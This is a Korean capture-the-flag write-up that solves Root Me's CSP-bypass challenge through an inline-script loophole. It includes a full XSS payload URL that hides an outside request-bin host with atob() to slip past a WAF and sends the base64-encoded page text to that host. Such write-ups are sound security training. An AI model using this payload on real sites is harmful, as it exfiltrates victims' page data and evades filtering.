Root Me - CSP Bypass - Inline code

 

 

Home 페이지

 

홈 페이지에는 입력창이 보이고 아래와 같이 문자를 입력하면 페이지에 반영된다. 

 

 

 

페이지 내용을 보면 플래그 값이 봇만 확인이 가능하도록 설정이 되어있다고 한다. 또한 CSP가 설정이 되어 XSS는 불가하다고 적혀있다. 

 

 

 

 

만약 방금 전 입력창에다 <script> 태그를 사용하면 아래와 같은 에러 페이지가 출력이 된다. 

 

에러 원인은 "Content-Security-Policy"가 설정이 되어 있기 때문이다. 

connect-src 'none'; font-src 'none'; frame-src 'none'; img-src 'self';
manifest-src 'none'; media-src 'none'; object-src 'none'; script-src 'unsafe-inline';
style-src 'self'; worker-src 'none'; frame-ancestors 'none'; block-all-mixed-content;

 

 

보면 알겠지만 대부분이 none이거나 self이기 때문에 script 태그 사용이 불가하고 외부의 URL에 요청이 불가능하다. 

 

팁으로 https://csp-evaluator.withgoogle.com/에 들어가면 csp가 제대로 설정이 되지 않은 곳을 한눈에 확인이 가능하다. 

 

확인 결과 다른 건 안되지만 script를 인라인 방식으로 사용하는 건 허가가 되어있다. 

 

<img src=x onerror=alert(1)>를 입력하면 alert 창이 제대로 나온다. 

 

 

 

Report 페이지

 

신고 페이지에서는 같은 호스트의 주소를 입력하면 봇이 대신해서 그 페이지에 접속을 하는 기능을 가지고 있다. 

봇이 방문하는 시간은 몇 분 이상은 걸리며 너무 자주 요청을 하면 블락을 먹으니 주의한다. 

 

 

해결 방법

 

img 태그의 onerror를 이용해 인라인 방식으로 xss를 유발한다. 

그리고 알아야 할 것은 URL을 포함하는 내용이 있으면 WAF에 의해서 차단이 되므로 인코딩을 시켜줘야 한다. 

인코딩은 btoa(), atob() 함수를 사용했다. 

또 + 문자는 URL에서는 공백으로 인식을 하기 때문에 따로 인코딩을 해주거나 .concat() 메서드로 대체해서 사용한다. 

 

http://challenge01.root-me.org:58008/page?user=<img src=x onerror='window.location=atob("aHR0cHM6Ly9tYXFsc2JsLnJlcXVlc3QuZHJlYW1oYWNrLmdhbWVz").concat("/FETCH?html=").concat(btoa(document.body.innerText))'>

 

위의 문자를 Report 페이지에 입력하고 몇 분이 지나면 Request Bin에 요청이 날아온다. 

 

마찬가지로 document.body의 내용 또한 btoa()로 인코딩을 했기 때문에 atob()로 디코딩을 해줘야 플래그 값을 구할 수 있다.